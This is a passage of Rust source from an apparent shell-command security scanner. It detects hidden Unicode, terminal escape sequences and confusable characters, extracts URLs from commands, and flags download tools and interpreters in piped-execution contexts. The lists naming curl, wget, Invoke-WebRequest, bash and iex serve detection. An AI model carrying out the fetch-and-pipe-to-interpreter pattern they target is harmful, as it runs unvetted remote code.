1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
7#[derive(Debug, Clone, Copy, PartialEq, Eq)]
9pub enum ScanContext {
10 Exec,
12 Paste,
14 FileScan,
17}
18
19#[allow(dead_code)]
21mod tier1_generated {
22 include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
23}
24
25pub fn extractor_ids() -> &'static [&'static str] {
27 tier1_generated::EXTRACTOR_IDS
28}
29
30static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
32 Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
33});
34
35static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
37 Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
38});
39
40static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
42 Regex::new(
43 r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
44 )
45 .expect("url regex must compile")
46});
47
48pub struct ByteScanResult {
50 pub has_ansi_escapes: bool,
51 pub has_control_chars: bool,
52 pub has_bidi_controls: bool,
53 pub has_zero_width: bool,
54 pub has_invalid_utf8: bool,
55 pub has_unicode_tags: bool,
56 pub has_variation_selectors: bool,
57 pub has_invisible_math_operators: bool,
58 pub has_invisible_whitespace: bool,
59 pub has_hangul_fillers: bool,
60 pub has_confusable_text: bool,
61 pub details: Vec<ByteFinding>,
62}
63
64pub struct ByteFinding {
65 pub offset: usize,
66 pub byte: u8,
67 pub codepoint: Option<u32>,
69 pub description: String,
70}
71
72impl ByteScanResult {
73 pub fn with_ignored_range(mut self, ignore: &std::ops::Range<usize>) -> Self {
82 self.details.retain(|d| !ignore.contains(&d.offset));
83 self.has_ansi_escapes = false;
86 self.has_control_chars = false;
87 self.has_bidi_controls = false;
88 self.has_zero_width = false;
89 self.has_unicode_tags = false;
90 self.has_variation_selectors = false;
91 self.has_invisible_math_operators = false;
92 self.has_invisible_whitespace = false;
93 self.has_hangul_fillers = false;
94 self.has_confusable_text = false;
95 for d in &self.details {
96 let desc = d.description.as_str();
97 if desc.ends_with("escape sequence") || desc == "trailing escape byte" {
98 self.has_ansi_escapes = true;
99 } else if desc.starts_with("control character") {
100 self.has_control_chars = true;
101 } else if desc.starts_with("bidi control") {
102 self.has_bidi_controls = true;
103 } else if desc.starts_with("zero-width character") {
104 self.has_zero_width = true;
105 } else if desc.starts_with("unicode tag") {
106 self.has_unicode_tags = true;
107 } else if desc.starts_with("variation selector") {
108 self.has_variation_selectors = true;
109 } else if desc.starts_with("invisible math operator") {
110 self.has_invisible_math_operators = true;
111 } else if desc.starts_with("invisible whitespace") {
112 self.has_invisible_whitespace = true;
113 } else if desc.starts_with("hangul filler") {
114 self.has_hangul_fillers = true;
115 } else if desc.starts_with("confusable") || desc.starts_with("text confusable") {
116 self.has_confusable_text = true;
117 }
118 }
119 self
120 }
121}
122
123pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
125 match context {
126 ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
127 ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
128 ScanContext::FileScan => true,
130 }
131}
132
133pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
135 let mut result = ByteScanResult {
136 has_ansi_escapes: false,
137 has_control_chars: false,
138 has_bidi_controls: false,
139 has_zero_width: false,
140 has_invalid_utf8: false,
141 has_unicode_tags: false,
142 has_variation_selectors: false,
143 has_invisible_math_operators: false,
144 has_invisible_whitespace: false,
145 has_hangul_fillers: false,
146 has_confusable_text: false,
147 details: Vec::new(),
148 };
149
150 if std::str::from_utf8(input).is_err() {
152 result.has_invalid_utf8 = true;
153 }
154
155 let len = input.len();
156 let mut i = 0;
157 while i < len {
158 let b = input[i];
159
160 if b == 0x1b {
162 if i + 1 < len {
165 let next = input[i + 1];
166 if next == b'[' || next == b']' || next == b'_' || next == b'P' {
167 result.has_ansi_escapes = true;
168 result.details.push(ByteFinding {
169 offset: i,
170 byte: b,
171 codepoint: None,
172 description: match next {
173 b'[' => "CSI escape sequence",
174 b']' => "OSC escape sequence",
175 b'_' => "APC escape sequence",
176 b'P' => "DCS escape sequence",
177 _ => "escape sequence",
178 }
179 .to_string(),
180 });
181 i += 2;
182 continue;
183 }
184 } else {
185 result.has_ansi_escapes = true;
186 result.details.push(ByteFinding {
187 offset: i,
188 byte: b,
189 codepoint: None,
190 description: "trailing escape byte".to_string(),
191 });
192 }
193 }
194
195 if b == b'\r' {
198 let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
199 if is_attack_cr {
200 result.has_control_chars = true;
201 result.details.push(ByteFinding {
202 offset: i,
203 byte: b,
204 codepoint: None,
205 description: format!("control character 0x{b:02x}"),
206 });
207 }
208 } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
209 result.has_control_chars = true;
210 result.details.push(ByteFinding {
211 offset: i,
212 byte: b,
213 codepoint: None,
214 description: format!("control character 0x{b:02x}"),
215 });
216 }
217
218 if b == 0x7F {
219 result.has_control_chars = true;
220 result.details.push(ByteFinding {
221 offset: i,
222 byte: b,
223 codepoint: None,
224 description: "control character 0x7f (DEL)".to_string(),
225 });
226 }
227
228 if b >= 0xc0 {
231 let remaining = &input[i..];
232 if let Some(ch) = std::str::from_utf8(remaining)
233 .ok()
234 .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
235 .and_then(|s| s.chars().next())
236 {
237 if is_bidi_control(ch) {
238 result.has_bidi_controls = true;
239 result.details.push(ByteFinding {
240 offset: i,
241 byte: b,
242 codepoint: Some(ch as u32),
243 description: format!("bidi control U+{:04X}", ch as u32),
244 });
245 }
246 if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
249 result.has_zero_width = true;
250 result.details.push(ByteFinding {
251 offset: i,
252 byte: b,
253 codepoint: Some(ch as u32),
254 description: format!("zero-width character U+{:04X}", ch as u32),
255 });
256 }
257 if is_unicode_tag(ch) {
259 result.has_unicode_tags = true;
260 result.details.push(ByteFinding {
261 offset: i,
262 byte: b,
263 codepoint: Some(ch as u32),
264 description: format!("unicode tag U+{:04X}", ch as u32),
265 });
266 }
267 if is_variation_selector(ch) {
269 result.has_variation_selectors = true;
270 result.details.push(ByteFinding {
271 offset: i,
272 byte: b,
273 codepoint: Some(ch as u32),
274 description: format!("variation selector U+{:04X}", ch as u32),
275 });
276 }
277 if is_invisible_math_operator(ch) {
279 result.has_invisible_math_operators = true;
280 result.details.push(ByteFinding {
281 offset: i,
282 byte: b,
283 codepoint: Some(ch as u32),
284 description: format!("invisible math operator U+{:04X}", ch as u32),
285 });
286 }
287 if is_invisible_whitespace(ch) {
289 result.has_invisible_whitespace = true;
290 result.details.push(ByteFinding {
291 offset: i,
292 byte: b,
293 codepoint: Some(ch as u32),
294 description: format!("invisible whitespace U+{:04X}", ch as u32),
295 });
296 }
297 if is_hangul_filler(ch) {
298 result.has_hangul_fillers = true;
299 result.details.push(ByteFinding {
300 offset: i,
301 byte: b,
302 codepoint: Some(ch as u32),
303 description: format!("hangul filler U+{:04X}", ch as u32),
304 });
305 }
306 if let Some(target) = crate::text_confusables::is_text_confusable(ch) {
308 result.has_confusable_text = true;
309 result.details.push(ByteFinding {
310 offset: i,
311 byte: b,
312 codepoint: Some(ch as u32),
313 description: format!(
314 "text confusable U+{:04X} (looks like '{target}')",
315 ch as u32
316 ),
317 });
318 } else if let Some(target) = crate::confusables::is_confusable(ch) {
319 result.has_confusable_text = true;
320 result.details.push(ByteFinding {
321 offset: i,
322 byte: b,
323 codepoint: Some(ch as u32),
324 description: format!(
325 "confusable U+{:04X} (looks like '{target}')",
326 ch as u32
327 ),
328 });
329 }
330 i += ch.len_utf8();
331 continue;
332 }
333 }
334
335 i += 1;
336 }
337
338 result
339}
340
341fn is_bidi_control(ch: char) -> bool {
343 matches!(
344 ch,
345 '\u{200E}' | '\u{200F}' | '\u{202A}' | '\u{202B}' | '\u{202C}' | '\u{202D}' | '\u{202E}' | '\u{2066}' | '\u{2067}' | '\u{2068}' | '\u{2069}' )
357}
358
359fn is_zero_width(ch: char) -> bool {
361 matches!(
362 ch,
363 '\u{180E}' | '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{FEFF}' | '\u{034F}' | '\u{00AD}' | '\u{2060}' )
372}
373
374fn is_unicode_tag(ch: char) -> bool {
376 ('\u{E0000}'..='\u{E007F}').contains(&ch)
377}
378
379fn is_variation_selector(ch: char) -> bool {
381 ('\u{FE00}'..='\u{FE0F}').contains(&ch) || ('\u{E0100}'..='\u{E01EF}').contains(&ch)
382}
383
384fn is_hangul_filler(ch: char) -> bool {
386 matches!(
387 ch,
388 '\u{3164}' | '\u{115F}' | '\u{1160}' )
392}
393
394fn is_invisible_math_operator(ch: char) -> bool {
397 ('\u{2061}'..='\u{2064}').contains(&ch)
398}
399
400fn is_invisible_whitespace(ch: char) -> bool {
405 matches!(
406 ch,
407 '\u{2000}' | '\u{2001}' | '\u{2002}' | '\u{2003}' | '\u{2004}' | '\u{2005}' | '\u{2006}' | '\u{2007}' | '\u{2008}' | '\u{2009}' | '\u{200A}' | '\u{205F}' )
420}
421
422pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
425 let segments = tokenize::tokenize(input, shell);
426 let mut results = Vec::new();
427
428 for (seg_idx, segment) in segments.iter().enumerate() {
429 let sink_context = is_sink_context(segment, &segments);
430 let resolved = resolve_segment_command(segment);
431
432 let inspection_skip_args_from: Option<usize> = if seg_idx == 0 {
439 resolved.as_ref().and_then(|cmd| {
440 if cmd.name != "tirith" {
441 return None;
442 }
443 let start_from: usize =
445 if segment.command.as_deref().map(command_base_name).as_deref()
446 == Some("tirith")
447 {
448 0
449 } else if let Some(at) = segment
450 .args
451 .iter()
452 .position(|a| command_base_name(a) == "tirith")
453 {
454 at + 1
455 } else {
456 return None;
457 };
458 let mut i = start_from;
461 while i < segment.args.len() {
462 let clean = strip_quotes(&segment.args[i]);
463 if clean.starts_with('-') {
464 i += 1;
465 continue;
466 }
467 break;
468 }
469 let sub_arg = segment.args.get(i)?;
470 if is_tirith_inspection_subcommand(&command_base_name(sub_arg)) {
471 Some(i)
472 } else {
473 None
474 }
475 })
476 } else {
477 None
478 };
479
480 let mut url_sources: Vec<&str> = Vec::new();
484 if let Some(ref cmd) = segment.command {
485 url_sources.push(cmd.as_str());
486 }
487 for (arg_idx, arg) in segment.args.iter().enumerate() {
488 if let Some(skip_from) = inspection_skip_args_from {
491 if arg_idx >= skip_from {
492 break;
493 }
494 }
495 url_sources.push(arg.as_str());
496 }
497 for (name, value) in tokenize::leading_env_assignments(&segment.raw) {
498 if ignores_env_assignment_url(&name) {
499 continue;
500 }
501 let clean = strip_quotes(&value);
502 if !clean.is_empty() {
503 push_urls_from_source(&clean, seg_idx, sink_context, &mut results);
504 }
505 }
506 for source in &url_sources {
507 push_urls_from_source(source, seg_idx, sink_context, &mut results);
508 }
509
510 let is_docker_cmd = resolved
513 .as_ref()
514 .is_some_and(|cmd| matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl"));
515 if sink_context && !is_docker_cmd {
516 if let Some(cmd) = resolved.as_ref() {
517 let is_remote_copy = matches!(cmd.name.as_str(), "scp" | "rsync");
525 for (arg_idx, arg) in cmd.args.iter().enumerate() {
526 if is_output_flag_value(&cmd.name, cmd.args, arg_idx) {
528 continue;
529 }
530 let clean = strip_quotes(arg);
531 if is_remote_copy {
532 let _ = parse_scp_remote_spec(&clean, shell);
536 continue;
537 }
538 if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
539 results.push(ExtractedUrl {
540 raw: clean.clone(),
541 parsed: UrlLike::SchemelessHostPath {
542 host: extract_host_from_schemeless(&clean),
543 path: extract_path_from_schemeless(&clean),
544 },
545 segment_index: seg_idx,
546 in_sink_context: true,
547 });
548 }
549 }
550 }
551 }
552
553 if let Some(cmd) = resolved.as_ref() {
555 if matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl") {
556 if let Some(docker_subcmd) = cmd.args.first() {
557 let subcmd_lower = docker_subcmd.to_lowercase();
558 if subcmd_lower == "build" {
559 let mut i = 1;
562 while i < cmd.args.len() {
563 let arg = strip_quotes(&cmd.args[i]);
564 if (arg == "-t" || arg == "--tag") && i + 1 < cmd.args.len() {
565 let tag_val = strip_quotes(&cmd.args[i + 1]);
566 if !tag_val.is_empty() {
567 let docker_url = parse::parse_docker_ref(&tag_val);
568 results.push(ExtractedUrl {
569 raw: tag_val,
570 parsed: docker_url,
571 segment_index: seg_idx,
572 in_sink_context: true,
573 });
574 }
575 i += 2;
576 } else if arg.starts_with("-t") && arg.len() > 2 {
577 let tag_val = strip_quotes(&arg[2..]);
578 let docker_url = parse::parse_docker_ref(&tag_val);
579 results.push(ExtractedUrl {
580 raw: tag_val,
581 parsed: docker_url,
582 segment_index: seg_idx,
583 in_sink_context: true,
584 });
585 i += 1;
586 } else if let Some(val) = arg.strip_prefix("--tag=") {
587 let tag_val = strip_quotes(val);
588 let docker_url = parse::parse_docker_ref(&tag_val);
589 results.push(ExtractedUrl {
590 raw: tag_val,
591 parsed: docker_url,
592 segment_index: seg_idx,
593 in_sink_context: true,
594 });
595 i += 1;
596 } else {
597 i += 1;
598 }
599 }
600 } else if subcmd_lower == "image" {
601 if let Some(image_subcmd) = cmd.args.get(1) {
603 let image_subcmd_lower = image_subcmd.to_lowercase();
604 if matches!(
605 image_subcmd_lower.as_str(),
606 "pull" | "push" | "inspect" | "rm" | "tag"
607 ) {
608 extract_first_docker_image(&cmd.args[2..], seg_idx, &mut results);
609 }
610 }
611 } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
612 extract_first_docker_image(&cmd.args[1..], seg_idx, &mut results);
615 }
616 }
617 }
618 }
619 }
620
621 results
622}
623
624#[derive(Debug, Clone)]
626pub struct ExtractedUrl {
627 pub raw: String,
628 pub parsed: UrlLike,
629 pub segment_index: usize,
630 pub in_sink_context: bool,
631}
632
633const DOCKER_VALUE_FLAGS: &[&str] = &[
635 "--platform",
636 "--format",
637 "--filter",
638 "-f",
639 "--label",
640 "-l",
641 "--name",
642 "--hostname",
643 "--user",
644 "-u",
645 "--workdir",
646 "-w",
647 "--network",
648 "--net",
649 "--env",
650 "-e",
651 "--env-file",
652 "--publish",
653 "-p",
654 "--expose",
655 "--volume",
656 "-v",
657 "--mount",
658 "--add-host",
659 "--device",
660 "--entrypoint",
661 "--log-driver",
662 "--log-opt",
663 "--restart",
664 "--runtime",
665 "--cpus",
666 "--cpu-shares",
667 "--cpu-quota",
668 "--memory",
669 "--memory-reservation",
670 "--memory-swap",
671 "--shm-size",
672 "--ulimit",
673 "--security-opt",
674 "--sysctl",
675 "--tmpfs",
676 "--gpus",
677 "--ipc",
678 "--pid",
679 "--userns",
680 "--cgroupns",
681];
682
683const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
685
686fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
688 let mut skip_next = false;
689 let mut end_of_options = false;
690 for arg in args {
691 if skip_next {
692 skip_next = false;
693 continue;
694 }
695 let clean = strip_quotes(arg);
696 if clean == "--" {
697 end_of_options = true;
698 continue;
699 }
700 if !end_of_options && clean.starts_with("--") && clean.contains('=') {
701 continue;
702 }
703 if !end_of_options && clean.starts_with('-') {
704 if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
705 skip_next = true;
706 }
707 if DOCKER_VALUE_PREFIXES
708 .iter()
709 .any(|p| clean.starts_with(p) && clean.len() > p.len())
710 {
711 continue;
712 }
713 continue;
714 }
715 if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
716 let docker_url = parse::parse_docker_ref(&clean);
717 results.push(ExtractedUrl {
718 raw: clean,
719 parsed: docker_url,
720 segment_index: seg_idx,
721 in_sink_context: true,
722 });
723 }
724 break;
727 }
728}
729
730#[derive(Debug, Clone)]
731struct ResolvedCommand<'a> {
732 name: String,
733 args: &'a [String],
734}
735
736fn push_urls_from_source(
737 source: &str,
738 segment_index: usize,
739 in_sink_context: bool,
740 results: &mut Vec<ExtractedUrl>,
741) {
742 for mat in URL_REGEX.find_iter(source) {
743 let raw = mat.as_str().to_string();
744 let url = parse::parse_url(&raw);
745 results.push(ExtractedUrl {
746 raw,
747 parsed: url,
748 segment_index,
749 in_sink_context,
750 });
751 }
752}
753
754fn ignores_env_assignment_url(name: &str) -> bool {
755 let upper = name.to_ascii_uppercase();
756 upper == "NO_PROXY" || upper.ends_with("_PROXY")
757}
758
759fn env_long_flag_takes_value(flag: &str) -> bool {
760 let name = flag.split_once('=').map(|(name, _)| name).unwrap_or(flag);
761 matches!(name, "--unset" | "--chdir" | "--split-string")
762}
763
764fn command_base_name(raw: &str) -> String {
765 let clean = strip_quotes(raw);
766 clean
767 .rsplit(['/', '\\'])
768 .next()
769 .unwrap_or(clean.as_str())
770 .to_lowercase()
771}
772
773fn resolve_segment_command(segment: &Segment) -> Option<ResolvedCommand<'_>> {
774 let command = segment.command.as_ref()?;
775 resolve_named_command(command, &segment.args)
776}
777
778pub fn resolve_wrapped_command(segment: &Segment) -> Option<(String, Vec<String>)> {
787 let resolved = resolve_segment_command(segment)?;
788 Some((resolved.name, resolved.args.to_vec()))
789}
790
791fn resolve_named_command<'a>(command: &str, args: &'a [String]) -> Option<ResolvedCommand<'a>> {
792 let name = command_base_name(command);
793 match name.as_str() {
794 "env" => resolve_env_command(args),
795 "command" => resolve_command_wrapper(args),
796 "time" => resolve_time_wrapper(args),
797 "sudo" | "doas" => resolve_sudo_wrapper(args),
798 "tirith" => resolve_tirith_command(args),
799 _ => Some(ResolvedCommand { name, args }),
800 }
801}
802
803fn resolve_sudo_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
815 const SUDO_VALUE_FLAGS: &[&str] = &["-u", "-g", "-p", "-C", "-D", "-U", "-r", "-t"];
822 const SUDO_LONG_VALUE_FLAGS: &[&str] = &[
824 "--user",
825 "--group",
826 "--prompt",
827 "--close-from",
828 "--chdir",
829 "--other-user",
830 "--role",
831 "--type",
832 "--host",
833 ];
834
835 let mut i = 0;
836 let mut after_dashdash = false;
837 while i < args.len() {
838 let clean = strip_quotes(&args[i]);
839 if !after_dashdash && clean == "--" {
840 after_dashdash = true;
841 i += 1;
842 continue;
843 }
844 if !after_dashdash && tokenize::is_env_assignment(&clean) {
846 i += 1;
847 continue;
848 }
849 if !after_dashdash && clean.starts_with("--") {
850 let name_part = clean.split_once('=').map(|(n, _)| n).unwrap_or(&clean);
851 if !clean.contains('=') && SUDO_LONG_VALUE_FLAGS.contains(&name_part) {
852 i += 2;
853 } else {
854 i += 1;
855 }
856 continue;
857 }
858 if !after_dashdash && clean.starts_with('-') {
859 if SUDO_VALUE_FLAGS.contains(&clean.as_str()) {
860 i += 2;
861 continue;
862 }
863 i += 1;
864 continue;
865 }
866 return resolve_named_command(&clean, &args[i + 1..]);
868 }
869 None
870}
871
872fn resolve_env_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
873 let mut i = 0;
874 while i < args.len() {
875 let clean = strip_quotes(&args[i]);
876 if clean == "--" {
877 i += 1;
878 break;
879 }
880 if tokenize::is_env_assignment(&clean) {
881 i += 1;
882 continue;
883 }
884 if clean.starts_with('-') {
885 if clean.starts_with("--") {
886 if env_long_flag_takes_value(&clean) && !clean.contains('=') {
887 i += 2;
888 } else {
889 i += 1;
890 }
891 continue;
892 }
893 if clean == "-u" || clean == "-C" || clean == "-S" {
894 i += 2;
895 continue;
896 }
897 i += 1;
898 continue;
899 }
900 return resolve_named_command(&clean, &args[i + 1..]);
901 }
902
903 while i < args.len() {
904 let clean = strip_quotes(&args[i]);
905 if tokenize::is_env_assignment(&clean) {
906 i += 1;
907 continue;
908 }
909 return resolve_named_command(&clean, &args[i + 1..]);
910 }
911
912 None
913}
914
915fn resolve_command_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
916 let mut i = 0;
917 while i < args.len() {
918 let clean = strip_quotes(&args[i]);
919 if clean == "--" {
920 i += 1;
921 break;
922 }
923 if clean.starts_with('-') {
924 i += 1;
925 continue;
926 }
927 break;
928 }
929 args.get(i)
930 .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
931}
932
933fn resolve_time_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
934 let mut i = 0;
935 while i < args.len() {
936 let clean = strip_quotes(&args[i]);
937 if clean == "--" {
938 i += 1;
939 break;
940 }
941 if clean.starts_with('-') {
942 if clean == "-f" || clean == "--format" || clean == "-o" || clean == "--output" {
943 i += 2;
944 } else {
945 i += 1;
946 }
947 continue;
948 }
949 break;
950 }
951 args.get(i)
952 .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
953}
954
955fn resolve_tirith_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
956 let subcommand = args.first().map(|arg| command_base_name(arg))?;
957 match subcommand.as_str() {
958 "run" => Some(ResolvedCommand {
959 name: "tirith-run".to_string(),
960 args: &args[1..],
961 }),
962 _ => Some(ResolvedCommand {
963 name: "tirith".to_string(),
964 args,
965 }),
966 }
967}
968
969fn is_tirith_inspection_subcommand(sub: &str) -> bool {
978 matches!(sub, "diff" | "score" | "why" | "receipt" | "explain")
979}
980
981pub fn tirith_inert_arg_range(input: &str, shell: ShellType) -> Option<std::ops::Range<usize>> {
1000 let segments = tokenize::tokenize(input, shell);
1001 let first = segments.first()?;
1002
1003 let resolved = resolve_segment_command(first)?;
1005 if resolved.name != "tirith" {
1006 return None;
1007 }
1008
1009 let mut sub_idx = 0;
1012 while sub_idx < resolved.args.len() {
1013 let clean = strip_quotes(&resolved.args[sub_idx]);
1014 if clean.starts_with('-') {
1015 sub_idx += 1;
1016 continue;
1017 }
1018 break;
1019 }
1020 let sub_arg = resolved.args.get(sub_idx)?;
1021 let subcommand = command_base_name(sub_arg);
1022 if !is_tirith_inspection_subcommand(&subcommand) {
1023 return None;
1024 }
1025
1026 let seg_slice = input.get(first.byte_range.clone())?;
1032 let sub_rel = find_subcommand_token(seg_slice, sub_arg.as_str())?;
1033 let inert_start = first.byte_range.start + sub_rel + sub_arg.len();
1034 let inert_end = first.byte_range.end;
1035 if inert_start >= inert_end {
1036 return None;
1037 }
1038 Some(inert_start..inert_end)
1039}
1040
1041fn find_subcommand_token(haystack: &str, needle: &str) -> Option<usize> {
1045 let bytes = haystack.as_bytes();
1046 let n = needle.len();
1047 let mut search_from = 0;
1048 while let Some(rel) = haystack.get(search_from..)?.find(needle) {
1049 let abs = search_from + rel;
1050 let preceded_by_ws_or_start =
1051 abs == 0 || matches!(bytes.get(abs - 1), Some(b) if b.is_ascii_whitespace());
1052 let followed_by_ws_or_end = abs + n == bytes.len()
1055 || matches!(bytes.get(abs + n), Some(b) if b.is_ascii_whitespace());
1056 if preceded_by_ws_or_start && followed_by_ws_or_end {
1057 return Some(abs);
1058 }
1059 search_from = abs + 1;
1060 }
1061 None
1062}
1063
1064fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
1066 if let Some(cmd) = resolve_segment_command(segment) {
1067 let cmd_lower = cmd.name;
1068 if cmd_lower == "git" {
1070 return is_git_sink(cmd.args);
1071 }
1072 if is_source_command(&cmd_lower) {
1073 return true;
1074 }
1075 }
1076
1077 if let Some(sep) = &segment.preceding_separator {
1079 if sep == "|" || sep == "|&" {
1080 if let Some(cmd) = resolve_segment_command(segment) {
1082 if is_interpreter(&cmd.name) {
1083 return true;
1084 }
1085 }
1086 }
1087 }
1088
1089 false
1090}
1091
1092fn is_source_command(cmd: &str) -> bool {
1093 matches!(
1094 cmd,
1095 "curl"
1096 | "wget"
1097 | "http"
1098 | "https"
1099 | "xh"
1100 | "fetch"
1101 | "scp"
1102 | "rsync"
1103 | "docker"
1104 | "podman"
1105 | "nerdctl"
1106 | "pip"
1107 | "pip3"
1108 | "npm"
1109 | "npx"
1110 | "yarn"
1111 | "pnpm"
1112 | "go"
1113 | "cargo"
1114 | "iwr"
1115 | "irm"
1116 | "invoke-webrequest"
1117 | "invoke-restmethod"
1118 | "tirith-run"
1119 )
1120}
1121
1122pub struct ScpRemoteSpec {
1136 pub user: Option<String>,
1137 pub host: String,
1138 pub path: String,
1139}
1140
1141pub fn parse_scp_remote_spec(arg: &str, shell: ShellType) -> Option<ScpRemoteSpec> {
1158 if arg.is_empty() || arg.starts_with('-') || arg.contains("://") {
1159 return None;
1160 }
1161
1162 if let Some(at_pos) = arg.find('@') {
1168 let before_at = &arg[..at_pos];
1169 let after_at = &arg[at_pos + 1..];
1170 if before_at.is_empty() || after_at.is_empty() || before_at.contains(':') {
1171 return None;
1172 }
1173 let (host, path) = match after_at.find(':') {
1174 Some(colon_pos) => {
1175 if colon_pos > 0 && after_at.as_bytes()[colon_pos - 1] == b'/' {
1178 return None;
1179 }
1180 (
1181 &after_at[..colon_pos],
1182 after_at[colon_pos + 1..].to_string(),
1183 )
1184 }
1185 None => (after_at, String::new()),
1186 };
1187 if !is_valid_scp_host(host) {
1188 return None;
1189 }
1190 return Some(ScpRemoteSpec {
1191 user: Some(before_at.to_string()),
1192 host: host.to_string(),
1193 path,
1194 });
1195 }
1196
1197 let colon_pos = arg.find(':')?;
1199 if colon_pos > 0 && arg.as_bytes()[colon_pos - 1] == b'/' {
1200 return None;
1201 }
1202 let host = &arg[..colon_pos];
1203 let after_colon = &arg[colon_pos + 1..];
1204 if !is_valid_scp_host(host) {
1205 return None;
1206 }
1207
1208 if host.len() == 1 && host.chars().next().unwrap().is_ascii_alphabetic() {
1211 let first_after = after_colon.chars().next();
1212 match first_after {
1213 Some('\\') => return None,
1214 Some('/') if matches!(shell, ShellType::PowerShell | ShellType::Cmd) => {
1215 return None;
1216 }
1217 _ => {}
1218 }
1219 }
1220
1221 Some(ScpRemoteSpec {
1222 user: None,
1223 host: host.to_string(),
1224 path: after_colon.to_string(),
1225 })
1226}
1227
1228fn is_valid_scp_host(host: &str) -> bool {
1229 !host.is_empty()
1230 && !host.contains('/')
1231 && !host.contains(':')
1232 && host
1233 .chars()
1234 .all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
1235}
1236
1237fn is_git_sink(args: &[String]) -> bool {
1240 if args.is_empty() {
1241 return false;
1242 }
1243 for arg in args {
1245 let clean = strip_quotes(arg);
1246 if clean.starts_with('-') {
1247 continue;
1248 }
1249 return matches!(
1250 clean.as_str(),
1251 "clone" | "fetch" | "pull" | "submodule" | "remote"
1252 );
1253 }
1254 false
1255}
1256
1257fn is_interpreter(cmd: &str) -> bool {
1258 matches!(
1259 cmd,
1260 "sh" | "bash"
1261 | "zsh"
1262 | "dash"
1263 | "ksh"
1264 | "python"
1265 | "python3"
1266 | "node"
1267 | "perl"
1268 | "ruby"
1269 | "php"
1270 | "iex"
1271 | "invoke-expression"
1272 )
1273}
1274
1275fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
1279 let cmd_lower = cmd.to_lowercase();
1280 let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
1281
1282 match cmd_base {
1283 "curl" => {
1284 if arg_index > 0 {
1285 let prev = strip_quotes(&args[arg_index - 1]);
1286 if prev == "-o"
1287 || prev == "--output"
1288 || prev == "-u"
1289 || prev == "--user"
1290 || prev == "-U"
1291 || prev == "--proxy-user"
1292 {
1293 return true;
1294 }
1295 }
1296 let current = strip_quotes(&args[arg_index]);
1297 if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
1298 return true;
1299 }
1300 if current.starts_with("--output=")
1301 || current.starts_with("--user=")
1302 || current.starts_with("--proxy-user=")
1303 {
1304 return true;
1305 }
1306 false
1307 }
1308 "wget" => {
1309 if arg_index > 0 {
1310 let prev = strip_quotes(&args[arg_index - 1]);
1311 if prev == "-O"
1312 || prev == "--output-document"
1313 || prev == "--user"
1314 || prev == "--password"
1315 || prev == "--http-user"
1316 || prev == "--http-password"
1317 || prev == "--ftp-user"
1318 || prev == "--ftp-password"
1319 || prev == "--proxy-user"
1320 || prev == "--proxy-password"
1321 {
1322 return true;
1323 }
1324 }
1325 let current = strip_quotes(&args[arg_index]);
1326 if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
1327 return true;
1328 }
1329 if current.starts_with("--output-document=")
1330 || current.starts_with("--user=")
1331 || current.starts_with("--password=")
1332 || current.starts_with("--http-user=")
1333 || current.starts_with("--http-password=")
1334 || current.starts_with("--ftp-user=")
1335 || current.starts_with("--ftp-password=")
1336 || current.starts_with("--proxy-user=")
1337 || current.starts_with("--proxy-password=")
1338 {
1339 return true;
1340 }
1341 false
1342 }
1343 "http" | "https" | "xh" => {
1344 if arg_index > 0 {
1345 let prev = strip_quotes(&args[arg_index - 1]);
1346 if prev == "-a" || prev == "--auth" {
1347 return true;
1348 }
1349 }
1350 let current = strip_quotes(&args[arg_index]);
1351 if current.starts_with("--auth=") {
1352 return true;
1353 }
1354 false
1355 }
1356 _ => false,
1357 }
1358}
1359
1360fn strip_quotes(s: &str) -> String {
1361 let s = s.trim();
1362 if s.len() >= 2
1363 && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
1364 {
1365 s[1..s.len() - 1].to_string()
1366 } else {
1367 s.to_string()
1368 }
1369}
1370
1371fn looks_like_schemeless_host(s: &str) -> bool {
1372 if s.starts_with('-') || !s.contains('.') {
1374 return false;
1375 }
1376 if s.starts_with('.') {
1378 return false;
1379 }
